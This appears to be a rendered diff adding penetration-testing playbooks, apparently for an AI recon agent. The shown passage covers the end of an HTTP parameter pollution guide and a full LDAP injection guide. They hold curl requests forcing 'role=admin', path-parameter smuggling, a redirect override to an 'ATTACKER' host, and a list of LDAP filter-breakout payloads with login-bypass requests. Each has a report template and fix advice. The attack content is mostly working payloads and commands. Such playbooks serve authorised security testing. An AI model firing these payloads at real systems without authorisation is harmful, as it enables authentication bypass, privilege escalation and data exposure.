role=admin
|
|
66
|
+
|
|
67
|
+
# JSON body override
|
|
68
|
+
{"param":1,"param":2}
|
|
69
|
+
PAYLOADS
|
|
70
|
+
```
|
|
71
|
+
|
|
72
|
+
## Phase 4: Query vs Body Overrides
|
|
73
|
+
```bash
|
|
74
|
+
# Send param in query and body
|
|
75
|
+
curl -s -X POST "$TARGET_URL?role=user" \
|
|
76
|
+
-H "Content-Type: application/x-www-form-urlencoded" \
|
|
77
|
+
--data "role=admin" \
|
|
78
|
+
| tee /workspace/output/TARGET_hpp_qs_body.txt
|
|
79
|
+
|
|
80
|
+
# JSON vs query
|
|
81
|
+
curl -s -X POST "$TARGET_URL?role=user" \
|
|
82
|
+
-H "Content-Type: application/json" \
|
|
83
|
+
--data '{"role":"admin"}' \
|
|
84
|
+
| tee /workspace/output/TARGET_hpp_qs_json.txt
|
|
85
|
+
```
|
|
86
|
+
|
|
87
|
+
## Phase 5: Path Parameter Smuggling
|
|
88
|
+
```bash
|
|
89
|
+
# Some servers parse ';' parameters in path
|
|
90
|
+
curl -s "https://TARGET/endpoint;role=admin" \
|
|
91
|
+
| tee /workspace/output/TARGET_hpp_path_semicolon.txt
|
|
92
|
+
```
|
|
93
|
+
|
|
94
|
+
## Phase 6: Validation Bypass Patterns
|
|
95
|
+
```bash
|
|
96
|
+
# Example: allowlist checks first value but app uses last value
|
|
97
|
+
# role=allowed&role=admin
|
|
98
|
+
# redirect=https://trusted.com&redirect=https://ATTACKER
|
|
99
|
+
# price=10&price=1
|
|
100
|
+
```
|
|
101
|
+
|
|
102
|
+
## Report Template
|
|
103
|
+
|
|
104
|
+
```
|
|
105
|
+
Target: TARGET
|
|
106
|
+
Assessment Date: <DATE>
|
|
107
|
+
|
|
108
|
+
## Confirmed Findings
|
|
109
|
+
- [ ] Parameter override via duplicates
|
|
110
|
+
- [ ] Query/body precedence mismatch
|
|
111
|
+
- [ ] Validation bypass via array or separator smuggling
|
|
112
|
+
|
|
113
|
+
## Evidence
|
|
114
|
+
- Precedence: /workspace/output/TARGET_hpp_precedence_1.txt
|
|
115
|
+
- Query vs body: /workspace/output/TARGET_hpp_qs_body.txt
|
|
116
|
+
|
|
117
|
+
## Recommendations
|
|
118
|
+
1. Reject duplicate parameters or enforce strict schema
|
|
119
|
+
2. Normalize parsing across proxy/WAF/app layers
|
|
120
|
+
3. Validate inputs after normalization and canonicalization
|
|
121
|
+
```
|
|
122
|
+
|
|
123
|
+
## Output Files
|
|
124
|
+
- `/workspace/output/TARGET_hpp_candidates.txt` — candidate endpoints
|
|
125
|
+
- `/workspace/output/TARGET_hpp_payloads.txt` — payload list
|
|
126
|
+
- `/workspace/output/TARGET_hpp_precedence_1.txt` — precedence test
|
|
127
|
+
- `/workspace/output/TARGET_hpp_qs_body.txt` — query vs body test
|
|
128
|
+
|
|
129
|
+
indicators: http parameter pollution, hpp, parameter pollution, duplicate parameters, array parameters
|
|
@@ -0,0 +1,100 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
# LDAP Injection Payloads
|
|
4
|
+
|
|
5
|
+
## Overview
|
|
6
|
+
LDAP injection targets unsanitized input embedded in LDAP filters, allowing
|
|
7
|
+
bypass of auth, data extraction, or filter manipulation.
|
|
8
|
+
|
|
9
|
+
## Prerequisites
|
|
10
|
+
```bash
|
|
11
|
+
apt-get install -y jq
|
|
12
|
+
```
|
|
13
|
+
|
|
14
|
+
## Phase 1: Map Filter Context
|
|
15
|
+
```bash
|
|
16
|
+
# Common filter patterns to target:
|
|
17
|
+
# (uid={input})
|
|
18
|
+
# (|(uid={input})(mail={input}))
|
|
19
|
+
# (&(objectClass=person)(uid={input}))
|
|
20
|
+
# (member={input})
|
|
21
|
+
```
|
|
22
|
+
|
|
23
|
+
## Phase 2: Payload List
|
|
24
|
+
```bash
|
|
25
|
+
cat > /workspace/output/TARGET_ldap_payloads.txt <<'PAYLOADS'
|
|
26
|
+
# Match all
|
|
27
|
+
*
|
|
28
|
+
|
|
29
|
+
# Classic filter breakouts
|
|
30
|
+
*)(|(uid=*))
|
|
31
|
+
*)(|(cn=*))
|
|
32
|
+
*)(|(mail=*))
|
|
33
|
+
*)(|(objectClass=*))
|
|
34
|
+
*)(userPassword=*)
|
|
35
|
+
|
|
36
|
+
# Boolean bypass variants
|
|
37
|
+
*)(|(uid=*))(|(uid=*
|
|
38
|
+
*)(|(uid=*))(|(uid=*)))
|
|
39
|
+
|
|
40
|
+
# Attribute override examples
|
|
41
|
+
*)(|(uid=*))(|(memberOf=*))
|
|
42
|
+
*)(|(uid=*))(|(employeeType=*))
|
|
43
|
+
|
|
44
|
+
# URL-encoded variants
|
|
45
|
+
%2a
|
|
46
|
+
%29%28%7c%28uid%3d%2a%29%29
|
|
47
|
+
|
|
48
|
+
# RFC4515 escaped variants (if input is partially escaped)
|
|
49
|
+
\2a
|
|
50
|
+
\29\28\7c\28uid\3d\2a\29\29
|
|
51
|
+
PAYLOADS
|
|
52
|
+
```
|
|
53
|
+
|
|
54
|
+
## Phase 3: Test Examples
|
|
55
|
+
```bash
|
|
56
|
+
TARGET_URL="https://TARGET/login"
|
|
57
|
+
|
|
58
|
+
# Example parameter: username
|
|
59
|
+
curl -s -X POST "$TARGET_URL" \
|
|
60
|
+
-H "Content-Type: application/x-www-form-urlencoded" \
|
|
61
|
+
--data "username=*)(|(uid=*))&password=test" \
|
|
62
|
+
| tee /workspace/output/TARGET_ldap_test_1.txt
|
|
63
|
+
```
|
|
64
|
+
|
|
65
|
+
## Phase 4: Blind / Differential Checks
|
|
66
|
+
```bash
|
|
67
|
+
# Compare response lengths or messages between payloads
|
|
68
|
+
# Use a benign payload to baseline
|
|
69
|
+
curl -s -X POST "$TARGET_URL" \
|
|
70
|
+
-H "Content-Type: application/x-www-form-urlencoded" \
|
|
71
|
+
--data "username=nonexistent&password=test" \
|
|
72
|
+
| tee /workspace/output/TARGET_ldap_baseline.txt
|
|
73
|
+
```
|
|
74
|
+
|
|
75
|
+
## Report Template
|
|
76
|
+
|
|
77
|
+
```
|
|
78
|
+
Target: TARGET
|
|
79
|
+
Assessment Date: <DATE>
|
|
80
|
+
|
|
81
|
+
## Confirmed Findings
|
|
82
|
+
- [ ] LDAP filter bypass via injection
|
|
83
|
+
- [ ] Data exposure via wildcard filter
|
|
84
|
+
|
|
85
|
+
## Evidence
|
|
86
|
+
- Response: /workspace/output/TARGET_ldap_test_1.txt
|
|
87
|
+
- Baseline: /workspace/output/TARGET_ldap_baseline.txt
|
|
88
|
+
|
|
89
|
+
## Recommendations
|
|
90
|
+
1. Use parameterized LDAP queries / safe filter builders
|
|
91
|
+
2. Escape special chars: * ( ) \0 \
|
|
92
|
+
3. Apply strict allowlists for usernames/attributes
|
|
93
|
+
```
|
|
94
|
+
|
|
95
|
+
## Output Files
|
|
96
|
+
- `/workspace/output/TARGET_ldap_payloads.txt` — payload list
|
|
97
|
+
- `/workspace/output/TARGET_ldap_test_1.txt` — test response
|
|
98
|
+
- `/workspace/output/TARGET_ldap_baseline.txt` — baseline response
|
|
99
|
+
|
|
100
|
+
indicators: ldap injection, ldap filter injection, directory injection, ldap wildcard
|